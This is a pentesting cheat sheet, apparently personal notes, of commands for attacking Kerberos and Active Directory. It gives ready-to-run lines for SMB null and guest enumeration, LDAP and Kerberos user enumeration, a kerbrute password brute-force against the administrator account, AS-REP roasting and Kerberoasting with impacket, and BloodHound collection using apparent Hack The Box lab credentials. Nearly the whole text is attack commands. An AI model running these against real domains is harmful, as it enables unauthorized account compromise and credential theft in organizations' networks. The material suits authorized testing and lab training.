Skip to content

88,464 - Pentesting kerberos

Recon Active Directory (No creds/sessions)

If you just have access to an AD environment but you don't have any credentials/sessions

Pentest the network Scan the network, find machines and open ports and try to exploit vulnerabilities or extract credentials from them (for example, Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.

gobuster dns -d $DOMAIN -r $IP -t 25 --wildcard -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Check for null and Guest access on smb services (this won't work on modern Windows versions): 

enum4linux -a -u "" -p "" $DCIP
enum4linux -a -u "guest" -p "" $DCIP


smbmap -u "" -p "" -P 445 -H $DCIP
smbmap -u "guest" -p "" -P 445 -H $DCIP

smbclient -U '%' -L //$DCIP
smbclient -U 'guest%' -L //

Enumerate Ldap 

nmap -n -sV --script "ldap* and not brute" -p 389 $DCIP

User enumeration

nmap 

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" $IP

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$DOMAIN",userdb=/root/Desktop/usernames.txt $IP

crackmapexec 

crackmapexec smb $DOMAIN -u '' -p '' --users
crackmapexec smb $DOMAIN -u 'guest' -p '' --users

kerbrute - users enumeration 

LIST_1='/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt'
LIST_2='/usr/share/wordlists/seclists/Usernames/Names/names.txt'
# DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum --dc $DOMAIN -d $DOMAIN $LIST_1

kerbrute - users bruteforce 

USER='administrator'
PASS='/usr/share/wordlists/rockyou.txt'
# DOMAIN='spookysec.local'

/opt/windows/kerbrute bruteuser --dc $DOMAIN -d $DOMAIN $PASS $USER -v

This attack looks for users without Kerberos pre-authentication required attribute. 

/opt/tools/impacket/examples/GetNPUsers.py "$DOMAIN/" -usersfile users.txt -no-pass -dc-ip $IP

Kerberoast - harvest TGS tickets for services 

/opt/tools/impacket/examples/GetUserSPNs.py -request -dc-ip $DCIP $DOMAIN/<USERNAME>

With user creds

BloodHound 

/opt/windows/BloodHound.py-1.0.1/bloodhound.py -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248